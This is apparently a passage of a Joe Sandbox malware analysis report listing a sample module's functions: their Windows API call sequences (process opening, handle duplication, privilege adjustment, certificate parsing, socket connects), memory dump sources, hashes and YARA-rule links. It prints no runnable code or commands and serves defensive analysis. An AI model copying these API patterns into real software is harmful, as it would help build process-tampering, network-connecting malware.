                                                                                                                                      • ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE00
                                                                                                                                      • ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE13
                                                                                                                                      • ZwOpenProcess.NTDLL(?,00000040,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE51
                                                                                                                                      • ZwDuplicateObject.NTDLL(?,?,000000FF,?,001FFFFF,00000000,00000000,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE73
                                                                                                                                      • ZwQueryInformationProcess.NTDLL(00010000,00000000,?,00000018,00000000,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE8B
                                                                                                                                      • ZwDuplicateObject.NTDLL(?,?,000000FF,00010000,001FFFFF,00000000,00000000,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CEC3
                                                                                                                                      • ZwClose.NTDLL(?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CECE
                                                                                                                                      • ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CEEB
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryProcessVirtual$InformationOpenQuery$AllocateDuplicateFreeObjectSystem$AdjustClosePrivilege
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1854996211-0
                                                                                                                                      • Opcode ID: 68171150ab6b89d2f5cb82e9351c6940e62097cef4a7cba4f5fb68112f253dd6
                                                                                                                                      • Instruction ID: 9605290f3d1d5b1f69fad4467bf72d8ce1f48ab3f05815f2a1c7b78818ddabea
                                                                                                                                      • Opcode Fuzzy Hash: 68171150ab6b89d2f5cb82e9351c6940e62097cef4a7cba4f5fb68112f253dd6
                                                                                                                                      • Instruction Fuzzy Hash: 18611BB1518345AFD700DF55C884DABB7E8FB88764F104A1DF6A993280E770EA49CB62
                                                                                                                                      Function 69EA44F0 Relevance: 19.6, APIs: 13, Instructions: 137encryptionmemoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69EA4160: _malloc.LIBCMT ref: 69EA4180
                                                                                                                                        • Part of subcall function 69EA4160: _memset.LIBCMT ref: 69EA418B
                                                                                                                                        • Part of subcall function 69EA4160: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 69EA41A9
                                                                                                                                      • CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 69EA4558
                                                                                                                                      • CryptMsgGetParam.CRYPT32(?,00000006,00000000,00000000,?), ref: 69EA457A
                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 69EA458B
                                                                                                                                      • CryptMsgGetParam.CRYPT32(?,00000006,00000000,00000000,?), ref: 69EA45A5
                                                                                                                                        • Part of subcall function 69EA4360: lstrcmpA.KERNEL32(1.3.6.1.4.1.311.2.1.12,00000000,585FE9A6,00000000,00000000,7569A0C0,00000000,69EC5490,69EE9550,000000FE,?,69EA45B7,?), ref: 69EA43BC
                                                                                                                                        • Part of subcall function 69EA4360: CryptDecodeObject.CRYPT32(00010001,1.3.6.1.4.1.311.2.1.12,?,?,00000000,00000000,?), ref: 69EA43F0
                                                                                                                                        • Part of subcall function 69EA4360: LocalAlloc.KERNEL32(00000040,?), ref: 69EA4400
                                                                                                                                        • Part of subcall function 69EA4360: CryptDecodeObject.CRYPT32(00010001,1.3.6.1.4.1.311.2.1.12,?,?,00000000,?,?), ref: 69EA4433
                                                                                                                                      • _printf.LIBCMT ref: 69EA45BC
                                                                                                                                      • CertFindCertificateInStore.CRYPT32(?,00010001,00000000,000B0000,?,00000000), ref: 69EA45F6
                                                                                                                                        • Part of subcall function 69EA41C0: _printf.LIBCMT ref: 69EA4222
                                                                                                                                        • Part of subcall function 69EA41C0: _printf.LIBCMT ref: 69EA4235
                                                                                                                                        • Part of subcall function 69EA41C0: CertGetNameStringA.CRYPT32(00000000,00000004,00000001,00000000,00000000,00000000), ref: 69EA4248
                                                                                                                                        • Part of subcall function 69EA41C0: LocalAlloc.KERNEL32(00000040,00000000), ref: 69EA425B
                                                                                                                                        • Part of subcall function 69EA41C0: CertGetNameStringA.CRYPT32(00000000,00000004,00000001,00000000,00000000,00000000), ref: 69EA4279
                                                                                                                                        • Part of subcall function 69EA41C0: LocalFree.KERNEL32(00000000), ref: 69EA4280
                                                                                                                                        • Part of subcall function 69EA41C0: CertGetNameStringA.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 69EA4292
                                                                                                                                        • Part of subcall function 69EA41C0: LocalAlloc.KERNEL32(00000040,00000000), ref: 69EA429D
                                                                                                                                        • Part of subcall function 69EA41C0: CertGetNameStringA.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 69EA42B5
                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 69EA4626
                                                                                                                                      • LocalFree.KERNEL32(?), ref: 69EA4631
                                                                                                                                      • LocalFree.KERNEL32(?), ref: 69EA463C
                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 69EA4643
                                                                                                                                      • CertFreeCertificateContext.CRYPT32(00000000), ref: 69EA464A
                                                                                                                                      • CertCloseStore.CRYPT32(?,00000000), ref: 69EA465B
                                                                                                                                      • CryptMsgClose.CRYPT32(?), ref: 69EA466A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Local$Cert$CryptFree$AllocNameString$Object_printf$CertificateCloseDecodeParamStore$ByteCharContextFindMultiQueryWide_malloc_memsetlstrcmp
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2337873942-0
                                                                                                                                      • Opcode ID: 16b4c1377e1ba167116d98d52cacf4a416328de2429d7eb5627a73fec08af987
                                                                                                                                      • Instruction ID: d4c378aa4742bf71f987c103bea4dda16ae372d6406a1baf99395928b1ecabc2
                                                                                                                                      • Opcode Fuzzy Hash: 16b4c1377e1ba167116d98d52cacf4a416328de2429d7eb5627a73fec08af987
                                                                                                                                      • Instruction Fuzzy Hash: 214168B1604342AFD710CF69D884F6BB7E8BFD9704F10891DB5599B250EB70E9088BA2
                                                                                                                                      Function 69EA41C0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 126encryptionmemoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _printf.LIBCMT ref: 69EA4222
                                                                                                                                      • _printf.LIBCMT ref: 69EA4235
                                                                                                                                      • CertGetNameStringA.CRYPT32(00000000,00000004,00000001,00000000,00000000,00000000), ref: 69EA4248
                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 69EA425B
                                                                                                                                      • CertGetNameStringA.CRYPT32(00000000,00000004,00000001,00000000,00000000,00000000), ref: 69EA4279
                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 69EA4280
                                                                                                                                      • CertGetNameStringA.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 69EA4292
                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 69EA429D
                                                                                                                                      • CertGetNameStringA.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 69EA42B5
                                                                                                                                      • _strncpy.LIBCMT ref: 69EA42D3
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CertNameString$Local$Alloc_printf$Free_strncpy
                                                                                                                                      • String ID: %02x
                                                                                                                                      • API String ID: 196360592-3293531392
                                                                                                                                      • Opcode ID: a6e6703930c9f49334e8549ebbee6d036a7922aae954d9acc3b8363d441f6164
                                                                                                                                      • Instruction ID: 30f8d379dbba86d1ea0823d66ab29f6fd67c1ebec0c639ffdf0e27307859da24
                                                                                                                                      • Opcode Fuzzy Hash: a6e6703930c9f49334e8549ebbee6d036a7922aae954d9acc3b8363d441f6164
                                                                                                                                      • Instruction Fuzzy Hash: A441E975E40315BBD711CF698C85FAFBFB8FB09B54F208119FA05AB280DB7498008AB4
                                                                                                                                      Function 69E9CFB0 Relevance: 18.2, APIs: 12, Instructions: 168nativememoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69E9CF00: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 69E9CF1B
                                                                                                                                      • ZwOpenProcess.NTDLL ref: 69E9D028
                                                                                                                                      • ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004), ref: 69E9D04E
                                                                                                                                      • ZwQuerySystemInformation.NTDLL(00000010,?,?,?), ref: 69E9D067
                                                                                                                                      • ZwFreeVirtualMemory.NTDLL(000000FF,001FFFFF,001FFFFF,00008000), ref: 69E9D081
                                                                                                                                      • ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004), ref: 69E9D0AA
                                                                                                                                      • ZwQuerySystemInformation.NTDLL(00000010,?,?,?), ref: 69E9D0BD
                                                                                                                                      • ZwDuplicateObject.NTDLL(001FFFFF,?,000000FF,?,00000000,00000000,00000002), ref: 69E9D0F3
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryVirtual$AllocateInformationQuerySystem$CreateDuplicateFreeObjectOpenProcessSnapshotToolhelp32
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3499649989-0
                                                                                                                                      • Opcode ID: 3b56354f8f30259e194906e5e5d6d968ba9c45467599e78df6896e4312e013f7
                                                                                                                                      • Instruction ID: 3c3f69eb9a8f13db6038b0a862e46b2fd163c76a138f011cadf245ca580b52d2
                                                                                                                                      • Opcode Fuzzy Hash: 3b56354f8f30259e194906e5e5d6d968ba9c45467599e78df6896e4312e013f7
                                                                                                                                      • Instruction Fuzzy Hash: 3E517FB2518344AFD700CF55C880D6BB7F8FBC9764F504A1EF6A592280DB70EA49CB62
                                                                                                                                      Function 69E84640 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 97filetimeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetLocalTime.KERNEL32(00000000,00000000), ref: 69E846C1
                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 69E846C7
                                                                                                                                      • _sprintf.LIBCMT ref: 69E846F0
                                                                                                                                        • Part of subcall function 69EA3E30: _memset.LIBCMT ref: 69EA3E65
                                                                                                                                        • Part of subcall function 69EA3E30: _sprintf.LIBCMT ref: 69EA3E7B
                                                                                                                                      • OpenFileMappingA.KERNEL32(000F001F,00000000,?), ref: 69E84711
                                                                                                                                      • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 69E84738
                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 69E8474A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$Mapping_sprintf$CreateCurrentLocalOpenProcessTimeView_memset
                                                                                                                                      • String ID: %d-{%d}-%d$TH_MAP_DATA
                                                                                                                                      • API String ID: 626235581-1469962609
                                                                                                                                      • Opcode ID: c24ecfb531ba99261e78c09b6844105022a37bc7f2c30f3fe64712dff9a3b6c0
                                                                                                                                      • Instruction ID: 51d4d67992c2e0a79ebad44ec9fd24b5d6e8d8f7da7f30f7595e26058265d51a
                                                                                                                                      • Opcode Fuzzy Hash: c24ecfb531ba99261e78c09b6844105022a37bc7f2c30f3fe64712dff9a3b6c0
                                                                                                                                      • Instruction Fuzzy Hash: 3A3169B0A483809FC785CF28D944B6FBBF6AF89700F44592EF189C7281E7709508CB12
                                                                                                                                      Function 69E8EAE0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 163COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69E8D970: socket.WS2_32(00000002,00000001,00000000), ref: 69E8D995
                                                                                                                                        • Part of subcall function 69E8D970: ioctlsocket.WS2_32 ref: 69E8D9B1
                                                                                                                                        • Part of subcall function 69E8D970: htons.WS2_32(?), ref: 69E8D9E1
                                                                                                                                        • Part of subcall function 69E8D970: inet_addr.WS2_32(?), ref: 69E8DA15
                                                                                                                                        • Part of subcall function 69E8D970: connect.WS2_32(?,?,00000010), ref: 69E8DA30
                                                                                                                                      • closesocket.WS2_32(?), ref: 69E8EB11
                                                                                                                                      • _memset.LIBCMT ref: 69E8EB86
                                                                                                                                      • _memset.LIBCMT ref: 69E8EBA3
                                                                                                                                      • closesocket.WS2_32(?), ref: 69E8EC52
                                                                                                                                      • closesocket.WS2_32(?), ref: 69E8EC83
                                                                                                                                      • closesocket.WS2_32(?), ref: 69E8ECB2
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: closesocket$_memset$connecthtonsinet_addrioctlsocketsocket
                                                                                                                                      • String ID: P
                                                                                                                                      • API String ID: 729250671-3110715001
                                                                                                                                      • Opcode ID: 7bc2de5b2678003b3cce2bc9172fa15aa02d84aac4ebe6e92ad760673cacd460
                                                                                                                                      • Instruction ID: 516de15b667d1ff0e400328b4c3ebdc1553180638602b5a4d8bc614a933a975e
                                                                                                                                      • Opcode Fuzzy Hash: 7bc2de5b2678003b3cce2bc9172fa15aa02d84aac4ebe6e92ad760673cacd460
                                                                                                                                      • Instruction Fuzzy Hash: 3B512B356047819FD720DFA4D6959EBB7E8BF85308F60896ED48DC7201EB30E50D8792
                                                                                                                                      Function 69E8ECE0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 163COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69E8D970: socket.WS2_32(00000002,00000001,00000000), ref: 69E8D995
                                                                                                                                        • Part of subcall function 69E8D970: ioctlsocket.WS2_32 ref: 69E8D9B1
                                                                                                                                        • Part of subcall function 69E8D970: htons.WS2_32(?), ref: 69E8D9E1
                                                                                                                                        • Part of subcall function 69E8D970: inet_addr.WS2_32(?), ref: 69E8DA15
                                                                                                                                        • Part of subcall function 69E8D970: connect.WS2_32(?,?,00000010), ref: 69E8DA30
                                                                                                                                      • closesocket.WS2_32(?), ref: 69E8ED11
                                                                                                                                      • _memset.LIBCMT ref: 69E8ED87
                                                                                                                                      • _memset.LIBCMT ref: 69E8EDA4
                                                                                                                                      • closesocket.WS2_32(?), ref: 69E8EE52
                                                                                                                                      • closesocket.WS2_32(?), ref: 69E8EE83
                                                                                                                                      • closesocket.WS2_32(?), ref: 69E8EEB2
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: closesocket$_memset$connecthtonsinet_addrioctlsocketsocket
                                                                                                                                      • String ID: P
                                                                                                                                      • API String ID: 729250671-3110715001
                                                                                                                                      • Opcode ID: cfddda58f12aa51d8f7806aa8673923240bb8b42ae126203b8cbd1fc095a8c06
                                                                                                                                      • Instruction ID: e2742144575695949ee8a9fa202117b8964340c64d5a51962ae1deddc6f95e61
                                                                                                                                      • Opcode Fuzzy Hash: cfddda58f12aa51d8f7806aa8673923240bb8b42ae126203b8cbd1fc095a8c06
                                                                                                                                      • Instruction Fuzzy Hash: 7F5113356047419FD720DFA4D695AEBB7E8BF81308F60896EE48DC7641EB30E50D8B92
                                                                                                                                      Function 69E8E8E0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 162COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
